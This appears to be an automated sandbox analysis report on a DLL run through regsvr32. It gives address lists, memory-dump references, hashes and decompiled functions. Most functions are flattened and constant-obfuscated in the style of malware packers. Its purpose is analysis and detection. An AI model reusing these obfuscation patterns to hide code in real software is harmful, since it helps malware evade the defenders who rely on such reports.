0x100223b7
0x100223bb
0x100223bc
0x100223be
0x100223c0
0x100223c3
0x100223c3
0x100223c5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x100223cc
0x100223ce
0x100223d0
0x100223d2
0x100223d5
0x00000000
0x00000000
0x100220ef
0x100220ef
0x100220ef
0x00000000
0x00000000
0x1002209c
0x100220e5
0x100220e5
0x100220ea
0x00000000
0x100220ea
0x10022029
0x00000000
0x00000000
0x1002202b
0x10022030
0x10022033
0x1002203a
0x00000000
0x00000000
0x10022047
0x00000000
0x00000000
0x00000000
0x10022049
0x10021fa8
0x00000000
0x00000000
0x10021fb0
0x10021fba
0x10021fc0
0x10021fca
0x10021fd0
0x00000000
0x00000000
0x10021fd8
0x00000000
0x00000000
0x10021fda
0x10021fe8
0x10021ff0
0x00000000
0x00000000
0x00000000
0x10021ff0
0x10021fc8
0x00000000
0x00000000
0x00000000
0x10021fc8
0x10021fb8
0x00000000
0x00000000
0x00000000
0x10021f85
0x10021f90
0x10021f97
0x1002239f
0x1002239f
0x100223f7
0x100223f7
0x100223fc
0x10022401
0x10022401
0x10022405
0x100220f1
0x100220f7
0x100220ff
0x100220ff
0x00000000
0x10021f97
0x10021f83
0x10021f45
0x10021f4b
0x00000000
0x00000000
0x10021f56
0x10021f57
0x10021f58
0x10021f5d
0x00000000
0x10021f5d
0x10021f25
0x10021f2a
0x10021f35
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10021F09

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c6f2c44ad0f4b1ce536a6e682887f1d276e69f2be909d19d7a466459069a3f64
Instruction ID: 01c5118dcaabcc2c091b5d5a4b055393f2bae2e24bb86cc69438e3989527b8a9
Opcode Fuzzy Hash: c6f2c44ad0f4b1ce536a6e682887f1d276e69f2be909d19d7a466459069a3f64
Instruction Fuzzy Hash: 5AE17C74600219FFDB14DF94EC80AAE7BA9EF04310F918515FC19EB192DB39EA50EB61

Uniqueness

Uniqueness Score: -1.00%

Function 10019AB4 Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10019AB4(int _a4) {
				intOrPtr _v8;
				char _v10;
				char _v16;
				intOrPtr _t7;
				signed int _t9;
				signed int _t11;

				_t7 =  *0x100371f4; // 0x39cf7dc9
				_v8 = _t7;
				_v10 = 0;
				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t9 != 0) {
					_t11 = E1001144B( &_v16);
				} else {
					_t11 = _t9 | 0xffffffff;
				}
				return E10011A49(_t11, _v8);
			}

0x10019aba
0x10019ac1
0x10019ad0
0x10019ad4
0x10019adc
0x10019ae7
0x10019ade
0x10019ade
0x10019ade
0x10019af6

APIs

GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 10019AD4

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6fb8048d26798aabdb065b7190370d881244dc6dd0674c2651f209bec9f3c2cc
Instruction ID: f73de5d1d093ec5bb937c6023ed3e2d553d93eff10beaa8c1ff102332751d29a
Opcode Fuzzy Hash: 6fb8048d26798aabdb065b7190370d881244dc6dd0674c2651f209bec9f3c2cc
Instruction Fuzzy Hash: 03E09235A04208ABDB10DBA4C942ACD7BB8AF04714F104151E510DE1C0EA70D6489752

Uniqueness

Uniqueness Score: -1.00%

Function 04F6D5D6 Relevance: 1.4, Strings: 1, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04F6D5D6(void* __ecx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* _t130;
				void* _t137;
				void* _t143;
				void* _t146;
				void* _t150;
				void* _t153;
				signed int _t163;
				signed int _t166;
				signed int _t167;
				void* _t180;
				signed int _t183;
				signed int* _t188;
				void* _t190;

				_t188 =  &_v20;
				_v4 = _v4 & 0x00000000;
				_t130 = 0x5a403;
				_t183 = _v16;
				_v12 = 0x460bf;
				_t180 = __ecx;
				_v8 = 0x98fb9;
				goto L1;
				do {
					while(1) {
						L1:
						_t190 = _t130 - 0xbe35f;
						if(_t190 > 0) {
							break;
						}
						if(_t190 == 0) {
							_v16 = 0x968c55;
							_v16 = _v16 | 0x19b4982c;
							_v16 = _v16 ^ 0x19bf1721;
							_v20 = 0xc01f17;
							_v20 = _v20 + 0xf89e;
							_v20 = _v20 + 0xffffd260;
							_v20 = _v20 | 0xbe2b4bca;
							_v20 = _v20 ^ 0xbee73bbe;
							_t183 = _t183 + E04F6FB61(_v16, _t180 + 8, _v20);
						} else {
							if(_t130 == 0x1ceda) {
								_v20 = 0xc1f8c6;
								_v20 = _v20 << 9;
								_v20 = _v20 ^ 0x83fcd09a;
								_v16 = 0xffc067;
								_v16 = _v16 + 0xf3fc;
								_v16 = _v16 ^ 0x01094d52;
								_push(_t163);
								_t150 = E04F75C3D();
								_t188 =  &(_t188[1]);
								_t183 = _t183 + _t150;
								_t130 = 0xefcbd;
								continue;
							} else {
								if(_t130 == 0x59311) {
									_v16 = 0xaac320;
									_v16 = _v16 + 0xffffa1b1;
									_v16 = _v16 | 0x8bff0617;
									_v16 = _v16 ^ 0x8bf9bc9c;
									_v20 = 0xa26cdf;
									_v20 = _v20 + 0x65e6;
									_v20 = _v20 >> 7;
									_v20 = _v20 << 0xc;
									_v20 = _v20 ^ 0x1457bbaa;
									_push(_t163);
									_t153 = E04F75C3D();
									_t188 =  &(_t188[1]);
									_t183 = _t183 + _t153;
									_t130 = 0xbe35f;
									continue;
								} else {
									if(_t130 == 0x5a403) {
										_t183 = 0;
										_t130 = 0x64e59;
										continue;
									} else {
										if(_t130 != 0x64e59) {
											goto L17;
										} else {
											_v20 = 0xf38508;
											_t166 = 0x3c;
											_v20 = _v20 / _t166;
											_v20 = _v20 << 0x10;
											_v20 = _v20 ^ 0x0f04a65c;
											_v16 = 0xa9dc7c;
											_t167 = 0x1a;
											_v16 = _v16 / _t167;
											_v16 = _v16 ^ 0x0009d770;
											_t183 = _t183 + E04F6FB61(_v20, _t180 + 0x3c, _v16);
											_t130 = 0xf94f6;
											_pop(_t163);
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t183;
					}
					if(_t130 == 0xefcbd) {
						_v16 = 0xc6698b;
						_t163 = 0x2f;
						_push(_t163);
						_v16 = _v16 * 0x1e;
						_v16 = _v16 << 0xe;
						_v16 = _v16 ^ 0x1791bd5a;
						_v20 = 0x3eb029;
						_v20 = _v20 ^ 0x5939f7df;
						_v20 = _v20 / _t163;
						_v20 = _v20 * 0x7f;
						_v20 = _v20 ^ 0xf09c7608;
						_t137 = E04F75C3D();
						_t188 =  &(_t188[1]);
						_t183 = _t183 + _t137;
						_t130 = 0xf8a94;
						goto L17;
					} else {
						if(_t130 == 0xf8a94) {
							_v16 = 0xb108ad;
							_v16 = _v16 ^ 0xd086ab56;
							_v16 = _v16 ^ 0xd033ecf7;
							_v20 = 0xb12c81;
							_t163 = 0x53;
							_push(_t163);
							_v20 = _v20 / _t163;
							_v20 = _v20 << 9;
							_v20 = _v20 ^ 0x861c0a69;
							_v20 = _v20 ^ 0x825ee3f3;
							_t143 = E04F75C3D();
							_t188 =  &(_t188[1]);
							_t183 = _t183 + _t143;
							_t130 = 0x59311;
							goto L1;
						} else {
							if(_t130 != 0xf94f6) {
								goto L17;
							} else {
								_v20 = 0xf33816;
								_v20 = _v20 ^ 0x28daff9b;
								_v20 = _v20 ^ 0x282dd1b6;
								_v16 = 0xcd207f;
								_v16 = _v16 ^ 0xdcb3a293;
								_v16 = _v16 ^ 0xdc789dd0;
								_push(_t163);
								_t146 = E04F75C3D();
								_t188 =  &(_t188[1]);
								_t183 = _t183 + _t146;
								_t130 = 0x1ceda;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t130 != 0x5d72e);
				goto L20;
			}

0x04f6d5d6
0x04f6d5d9
0x04f6d5de
0x04f6d5e6
0x04f6d5f0
0x04f6d5f8
0x04f6d5fa
0x04f6d602
0x04f6d607
0x04f6d607
0x04f6d607
0x04f6d607
0x04f6d609
0x00000000
0x00000000
0x04f6d60f
0x04f6d883
0x04f6d88e
0x04f6d896
0x04f6d89e
0x04f6d8a6
0x04f6d8ae
0x04f6d8b6
0x04f6d8be
0x04f6d8d4
0x04f6d615
0x04f6d61a
0x04f6d6fb
0x04f6d703
0x04f6d708
0x04f6d710
0x04f6d718
0x04f6d720
0x04f6d730
0x04f6d731
0x04f6d736
0x04f6d739
0x04f6d73b
0x00000000
0x04f6d620
0x04f6d625
0x04f6d69f
0x04f6d6a7
0x04f6d6af
0x04f6d6b7
0x04f6d6bf
0x04f6d6c7
0x04f6d6cf
0x04f6d6d4
0x04f6d6d9
0x04f6d6e9
0x04f6d6ea
0x04f6d6ef
0x04f6d6f2
0x04f6d6f4
0x00000000
0x04f6d627
0x04f6d62c
0x04f6d696
0x04f6d698
0x00000000
0x04f6d62e
0x04f6d630
0x00000000
0x04f6d636
0x04f6d636
0x04f6d646
0x04f6d64b
0x04f6d651
0x04f6d656
0x04f6d65e
0x04f6d66a
0x04f6d670
0x04f6d674
0x04f6d689
0x04f6d68b
0x04f6d690
0x00000000
0x04f6d690
0x04f6d630
0x04f6d62c
0x04f6d625
0x04f6d61a
0x04f6d8d6
0x04f6d8df
0x04f6d8df
0x04f6d74a
0x04f6d810
0x04f6d821
0x04f6d822
0x04f6d823
0x04f6d827
0x04f6d82c
0x04f6d834
0x04f6d83c
0x04f6d84a
0x04f6d853
0x04f6d857
0x04f6d867
0x04f6d86c
0x04f6d86f
0x04f6d871
0x00000000
0x04f6d750
0x04f6d755
0x04f6d7af
0x04f6d7b9
0x04f6d7c1
0x04f6d7c9
0x04f6d7d7
0x04f6d7da
0x04f6d7db
0x04f6d7df
0x04f6d7e4
0x04f6d7ec
0x04f6d7fc
0x04f6d801
0x04f6d804
0x04f6d806
0x00000000
0x04f6d757
0x04f6d75c
0x00000000
0x04f6d762
0x04f6d762
0x04f6d76a
0x04f6d772
0x04f6d77a
0x04f6d782
0x04f6d78a
0x04f6d79a
0x04f6d79b
0x04f6d7a0
0x04f6d7a3
0x04f6d7a5
0x00000000
0x04f6d7a5
0x04f6d75c
0x04f6d755
0x00000000
0x04f6d876
0x04f6d876
0x00000000

Strings

e, xrefs: 04F6D6C7

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: e
API String ID: 0-233403005
Opcode ID: eb065b93501f03639842910e22d39e92e01ccea0a9a9eec34e1091c74b6c895f
Instruction ID: 06971c741b7729e648949956f36e9a1fdc3ef05594c96c6a813e65e935d6fb84
Opcode Fuzzy Hash: eb065b93501f03639842910e22d39e92e01ccea0a9a9eec34e1091c74b6c895f
Instruction Fuzzy Hash: E5715DB2A093468BD354DF24E64551BBBE0FB90B44F004D2DF59696220E3B5EA0D9BE3

Uniqueness

Uniqueness Score: -1.00%

Function 04F71DCF Relevance: 1.4, Strings: 1, Instructions: 130
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E04F71DCF(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v520;
				char _v552;
				void* _v564;
				intOrPtr _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				void* _t114;
				void* _t120;
				signed int _t134;
				signed int _t136;
				void* _t139;
				void* _t149;
				signed int* _t152;

				_push(_a4);
				_t149 = __ecx;
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t114);
				_t152 =  &(( &_v588)[3]);
				_v568 = 0xebd65;
				asm("stosd");
				_t139 = 0xd13;
				asm("stosd");
				asm("stosd");
				do {
					while(_t139 != 0xd13) {
						if(_t139 == 0x37b16) {
							_v576 = 0x835e35;
							_t134 = 0x74;
							_push(_t134);
							_v576 = _v576 / _t134;
							_v576 = _v576 ^ 0x7ab7c5aa;
							_v576 = _v576 * 0x72;
							_v576 = _v576 ^ 0xa572030b;
							_v584 = 0xba1b72;
							_v584 = _v584 | 0xd5e72c06;
							_v584 = _v584 ^ 0xd5f7d3b1;
							_v588 = 0xc6819;
							_v588 = _v588 >> 0xf;
							_v588 = _v588 ^ 0x3e3e9333;
							_v588 = _v588 ^ 0x3e3a6d37;
							_t64 =  &_v588; // 0x3e3a6d37
							_t120 = E04F7B9D9(_v576,  &_v520, _v584,  *_t64);
							_t152 =  &(_t152[3]);
							_t139 = 0xfda0c;
							continue;
						}
						if(_t139 != 0xfda0c) {
							goto L8;
						}
						_v580 = 0x85a5da;
						_t136 = 0x45;
						_v580 = _v580 / _t136;
						_v580 = _v580 + 0xffff3639;
						_v580 = _v580 + 0xffff78ee;
						_v580 = _v580 ^ 0x00016d4e;
						_v584 = 0x59f8d2;
						_v584 = _v584 * 0x77;
						_v584 = _v584 * 0x6c;
						_v584 = _v584 ^ 0xa4d35636;
						_v588 = 0x4324a7;
						_v588 = _v588 | 0x675fd3d2;
						_v588 = _v588 >> 3;
						_v588 = _v588 | 0xfe095bd7;
						_v588 = _v588 ^ 0xfeecdb75;
						return E04F7C9F9(_v580, _v584, _t136, _t149, _v588,  &_v520,  &_v552);
					}
					_v584 = 0x92917a;
					_v584 = _v584 + 0xffffe0c1;
					_v584 = _v584 | 0x0832c237;
					_v584 = _v584 ^ 0x08b2f22f;
					_v588 = 0x521def;
					_v588 = _v588 + 0xa89c;
					_v588 = _v588 >> 0xb;
					_v588 = _v588 >> 0xc;
					_v588 = _v588 ^ 0x000fe035;
					_v580 = 0xa5a96;
					_v580 = _v580 * 0x28;
					_v580 = _v580 + 0x2bc2;
					_v580 = _v580 + 0xffff2227;
					_v580 = _v580 ^ 0x01960de3;
					_v576 = 0x2eb856;
					_v576 = _v576 * 0x4f;
					_v576 = _v576 << 1;
					_v576 = _v576 ^ 0x8b3a551c;
					_v576 = _v576 ^ 0x97e281ca;
					_v572 = 0x46369e;
					_v572 = _v572 << 0xe;
					_v572 = _v572 + 0xffffb915;
					_v572 = _v572 ^ 0x8dac5a49;
					_t120 = E04F6E8B9(_v588, _v580, _v584, _v576, _v572,  &_v552);
					_t152 =  &(_t152[4]);
					_t139 = 0x37b16;
					L8:
				} while (_t139 != 0x8ad3a);
				return _t120;
			}

0x04f71dd9
0x04f71de0
0x04f71de2
0x04f71de3
0x04f71de4
0x04f71de9
0x04f71dec
0x04f71dfa
0x04f71e00
0x04f71e07
0x04f71e08
0x04f71e0e
0x04f71e0e
0x04f71e18
0x04f71ec7
0x04f71ed7
0x04f71eda
0x04f71edb
0x04f71ee3
0x04f71ef0
0x04f71ef4
0x04f71efc
0x04f71f04
0x04f71f0c
0x04f71f14
0x04f71f1c
0x04f71f21
0x04f71f29
0x04f71f31
0x04f71f3d
0x04f71f42
0x04f71f45
0x00000000
0x04f71f45
0x04f71e20
0x00000000
0x00000000
0x04f71e26
0x04f71e36
0x04f71e39
0x04f71e3d
0x04f71e45
0x04f71e4d
0x04f71e55
0x04f71e62
0x04f71e6b
0x04f71e73
0x04f71e7b
0x04f71e83
0x04f71e8b
0x04f71e90
0x04f71e98
0x00000000
0x04f71eb9
0x04f71f4c
0x04f71f54
0x04f71f5c
0x04f71f64
0x04f71f6c
0x04f71f74
0x04f71f7c
0x04f71f81
0x04f71f86
0x04f71f8e
0x04f71f9b
0x04f71f9f
0x04f71fa7
0x04f71faf
0x04f71fb7
0x04f71fc4
0x04f71fcc
0x04f71fd0
0x04f71fd8
0x04f71fe0
0x04f71fe8
0x04f71fed
0x04f71ff5
0x04f72012
0x04f72017
0x04f7201a
0x04f7201c
0x04f7201c
0x00000000

Strings

7m:>, xrefs: 04F71F31

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 7m:>
API String ID: 0-3900671141
Opcode ID: 86c6f944f64be2d7e6ef6bc2ccc83f9076b24c4a73c306fc7a6a475e13e8eee8
Instruction ID: 2a354c15b205d013b70e11a254a0c96d7ba928b772525f0e48871b820f2ba99a
Opcode Fuzzy Hash: 86c6f944f64be2d7e6ef6bc2ccc83f9076b24c4a73c306fc7a6a475e13e8eee8
Instruction Fuzzy Hash: 4B5122726083429BC354CF24D94941FBBE1FBD4748F100E1EF185A6260D7B8DA4E8B97

Uniqueness

Uniqueness Score: -1.00%

Function 04F686ED Relevance: 1.4, Strings: 1, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F686ED() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				void* _t99;
				signed int _t104;
				intOrPtr _t108;
				signed int _t112;
				signed int _t115;
				signed int _t122;
				signed int _t125;
				signed int* _t127;

				_t127 =  &_v548;
				_t99 = 0x30d8a;
				_v532 = 0xf509a;
				_v528 = 0x2cd62;
				_v524 = 0x39b0f;
				L1:
				while(_t99 != 0x4c86) {
					if(_t99 == 0x30d8a) {
						_t99 = 0x4c86;
						continue;
					}
					if(_t99 == 0x7e2c7) {
						_v544 = 0xa0e982;
						_v544 = _v544 * 0x75;
						_v544 = _v544 >> 2;
						_v544 = _v544 ^ 0x1262ae18;
						_t122 = _v544;
						_v548 = 0x93bd9d;
						_v548 = _v548 ^ 0x18495cc0;
						_v548 = _v548 >> 1;
						_v548 = _v548 * 0x5f;
						_v548 = _v548 ^ 0x9c99a83a;
						_v536 = 0x20432a;
						_v536 = _v536 >> 6;
						_v536 = _v536 ^ 0x000501fb;
						_v540 = 0xaf20d5;
						_v540 = _v540 | 0xe0e2f664;
						_v540 = _v540 + 0x2d8a;
						_v540 = _v540 ^ 0xe0f1fd0d;
						_v544 = 0xa049ff;
						_v544 = _v544 + 0xffff5342;
						_v544 = _v544 + 0xfa65;
						_v544 = _v544 ^ 0x00a27d94;
						_t112 = _v548;
						_t104 = E04F7E40B(_t112, _v536, _v540,  &_v520, _v544);
						_t127 =  &(_t127[3]);
						_t125 =  &_v520 + _t104 * 2;
						while(1) {
							__eflags = _t125 -  &_v520;
							if(_t125 <=  &_v520) {
								break;
							}
							__eflags =  *_t125 - 0x5c;
							if( *_t125 != 0x5c) {
								L10:
								_t125 = _t125 - 2;
								__eflags = _t125;
								continue;
							}
							_t122 = _t122 - 1;
							__eflags = _t122;
							if(_t122 == 0) {
								__eflags = _t125;
								L14:
								_t99 = 0xad40d;
								goto L1;
							}
							goto L10;
						}
						goto L14;
					}
					if(_t99 != 0xad40d) {
						L17:
						__eflags = _t99 - 0xcdb73;
						if(_t99 != 0xcdb73) {
							continue;
						}
						return _t99;
					}
					_v544 = 0xfaf499;
					_t115 = 0x13;
					_v544 = _v544 / _t115;
					_v544 = _v544 << 5;
					_v544 = _v544 + 0x30f5;
					_v544 = _v544 ^ 0x01a0a56f;
					_v548 = 0xfa2fc8;
					_v548 = _v548 + 0xaa28;
					_v548 = _v548 ^ 0x83cbcaea;
					_v548 = _v548 | 0x038c5cd0;
					_v548 = _v548 ^ 0x83b2cb92;
					_v536 = 0xe9be6d;
					_v536 = _v536 >> 1;
					_v536 = _v536 ^ 0x0079279e;
					_t108 =  *0x4f8221c; // 0x33fd420
					return E04F76D54(_v544, _v548, _t125, _v536, _t108 + 0x220);
				}
				_v540 = 0x25f1ec;
				_v540 = _v540 ^ 0x593ebbe8;
				_v540 = _v540 << 2;
				_v540 = _v540 ^ 0x64626b9f;
				_v548 = 0xcc751b;
				_v548 = _v548 | 0xc3ba8fcb;
				_v548 = _v548 ^ 0xa9773b38;
				_v548 = _v548 >> 0x10;
				_t95 =  &_v548;
				 *_t95 = _v548 ^ 0x0001c9a2;
				__eflags =  *_t95;
				E04F75B9E(_v540,  &_v520,  *_t95, _v548);
				_t112 = _t112;
				_t99 = 0x7e2c7;
				goto L17;
			}

0x04f686ed
0x04f686fa
0x04f686ff
0x04f6870c
0x04f6871a
0x00000000
0x04f68722
0x04f6872f
0x04f688bd
0x00000000
0x04f688bd
0x04f6873a
0x04f687db
0x04f687e8
0x04f687ec
0x04f687f1
0x04f687f9
0x04f687fd
0x04f68805
0x04f6880d
0x04f68816
0x04f6881e
0x04f68826
0x04f6882e
0x04f68833
0x04f6883b
0x04f68843
0x04f6884b
0x04f68853
0x04f6885b
0x04f68863
0x04f6886b
0x04f68873
0x04f68888
0x04f6888c
0x04f68895
0x04f68898
0x04f688a9
0x04f688ad
0x04f688af
0x00000000
0x00000000
0x04f6889d
0x04f688a1
0x04f688a6
0x04f688a6
0x04f688a6
0x00000000
0x04f688a6
0x04f688a3
0x04f688a3
0x04f688a4
0x04f688b3
0x04f688b6
0x04f688b6
0x00000000
0x04f688b6
0x00000000
0x04f688a4
0x00000000
0x04f688b1
0x04f68742
0x04f6891f
0x04f6891f
0x04f68924
0x00000000
0x00000000
0x00000000
0x04f68924
0x04f68748
0x04f68758
0x04f6875b
0x04f6875f
0x04f68764
0x04f6876c
0x04f68774
0x04f6877c
0x04f68784
0x04f6878c
0x04f68794
0x04f6879c
0x04f687a4
0x04f687a8
0x04f687b0
0x00000000
0x04f687cd
0x04f688c4
0x04f688d0
0x04f688d8
0x04f688dd
0x04f688e5
0x04f688ed
0x04f688f5
0x04f688fd
0x04f68902
0x04f68902
0x04f68902
0x04f68913
0x04f68919
0x04f6891a
0x00000000

Strings

*C , xrefs: 04F68826

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *C
API String ID: 0-715204138
Opcode ID: 6d4e712d912fc8d86a97469f158c715719cc1a061933d3e5ebebe5e50436cb0f
Instruction ID: ea5515c6a482d7ea9d2a7b286bf3a8e9ee3c9622c388442a18f4ee3c50e90bc8
Opcode Fuzzy Hash: 6d4e712d912fc8d86a97469f158c715719cc1a061933d3e5ebebe5e50436cb0f
Instruction Fuzzy Hash: 315103B25093428BD314DF24E54941BBBE4FB94788F104D2DF596A6260D3B4EA4E8F93

Uniqueness

Uniqueness Score: -1.00%

Function 04F760FA Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04F760FA(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t72;
				void* _t74;
				signed int _t81;
				signed int _t88;
				void* _t93;
				signed int _t96;
				intOrPtr _t97;
				signed int* _t100;

				_t88 = __ecx;
				_push(_a16);
				_t96 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04F732C4(_t72);
				_t100 =  &(( &_v20)[6]);
				_v8 = 0xd3c44;
				_t97 = 0;
				_t74 = 0x30112;
				_v4 = 0;
				while(_t74 != 0x30112) {
					if(_t74 == 0x577d9) {
						_t81 = E04F637FA();
						__eflags = _t81;
						if(_t81 != 0) {
							_t74 = 0xaa84c;
							continue;
						}
					} else {
						if(_t74 == 0x780ce) {
							_v12 = 0xb70767;
							_v12 = _v12 * 0x77;
							_v12 = _v12 + 0x4615;
							_v12 = _v12 ^ 0x551eed64;
							_v16 = 0xc5973d;
							_v16 = _v16 << 4;
							_v16 = _v16 + 0xffffcfaa;
							_v16 = _v16 ^ 0x0c573f6c;
							_v20 = 0xc7aa73;
							_v20 = _v20 | 0x606ea94d;
							_v20 = _v20 + 0xcc06;
							_v20 = _v20 << 5;
							_t67 =  &_v20;
							 *_t67 = _v20 ^ 0x1e0e4d91;
							__eflags =  *_t67;
							E04F7E4B2(_v12, _v16,  *_t67, _v20,  *0x4f82214);
						} else {
							if(_t74 == 0x8315d) {
								E04F6864D();
								_t74 = 0x780ce;
								continue;
							} else {
								if(_t74 != 0xaa84c) {
									L12:
									__eflags = _t74 - 0x10bb5;
									if(_t74 != 0x10bb5) {
										continue;
									} else {
									}
								} else {
									_v16 = 0xeb6f12;
									_v16 = _v16 ^ 0x833dc844;
									_v16 = _v16 + 0xffffffca;
									_v16 = _v16 ^ 0x83d2e080;
									_v20 = 0xfe0dde;
									_v20 = _v20 | 0x9e20b8a5;
									_v20 = _v20 * 0x52;
									_v20 = _v20 ^ 0xed9f8702;
									_v12 = 0x1afad6;
									_v12 = _v12 ^ 0x0285fd80;
									_v12 = _v12 ^ 0x0290bd49;
									_t88 = _v16;
									_t97 = E04F70EAF(_t88, _v20, _t96, _a8, _v12);
									_t100 =  &(_t100[3]);
									if(_t97 == 0) {
										_t74 = 0x8315d;
										continue;
									}
								}
							}
						}
					}
					return _t97;
				}
				_v20 = 0x4eab9;
				_t93 = 0x28;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 * 0xd;
				_v20 = _v20 ^ 0x1f7ec97c;
				_v16 = 0xccf74;
				_v16 = _v16 | 0xce74a9a2;
				_v16 = _v16 + 0xc9fb;
				_t42 =  &_v16;
				 *_t42 = _v16 ^ 0xce73e92f;
				__eflags =  *_t42;
				 *0x4f82214 = E04F73EE6(_t88, _t93,  *_t42);
				_t74 = 0x577d9;
				_t88 = _t88;
				goto L12;
			}

0x04f760fa
0x04f76101
0x04f76105
0x04f76107
0x04f7610b
0x04f7610f
0x04f76114
0x04f76115
0x04f7611a
0x04f7611d
0x04f76125
0x04f76127
0x04f7612c
0x04f7613a
0x04f7614a
0x04f761f7
0x04f761fc
0x04f761fe
0x04f76204
0x00000000
0x04f76204
0x04f76150
0x04f76152
0x04f76279
0x04f76286
0x04f7628a
0x04f76292
0x04f7629a
0x04f762a2
0x04f762a7
0x04f762af
0x04f762b7
0x04f762bf
0x04f762c7
0x04f762cf
0x04f762d4
0x04f762d4
0x04f762d4
0x04f762ee
0x04f76158
0x04f7615a
0x04f761eb
0x04f761f0
0x00000000
0x04f76160
0x04f76165
0x04f7626c
0x04f7626c
0x04f76271
0x00000000
0x00000000
0x04f76277
0x04f7616b
0x04f7616b
0x04f76173
0x04f7617b
0x04f76180
0x04f76188
0x04f76190
0x04f7619d
0x04f761a1
0x04f761a9
0x04f761b1
0x04f761b9
0x04f761cd
0x04f761d7
0x04f761d9
0x04f761de
0x04f761e4
0x00000000
0x04f761e4
0x04f761de
0x04f76165
0x04f7615a
0x04f76152
0x04f762fe
0x04f762fe
0x04f7620e
0x04f7621e
0x04f7621f
0x04f76228
0x04f7622c
0x04f76234
0x04f7623c
0x04f76244
0x04f7624c
0x04f7624c
0x04f7624c
0x04f76261
0x04f76266
0x04f7626b
0x00000000

Strings

D<, xrefs: 04F7611D

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D<
API String ID: 0-2240870732
Opcode ID: 56df4b0de433ea0b526dc559d1c75349f754f79653670223a7a44014eb00e15a
Instruction ID: f46f652d5c10fd6df389a21037d5859b81a9916ff717fd1ec7ce547dd6f93644
Opcode Fuzzy Hash: 56df4b0de433ea0b526dc559d1c75349f754f79653670223a7a44014eb00e15a
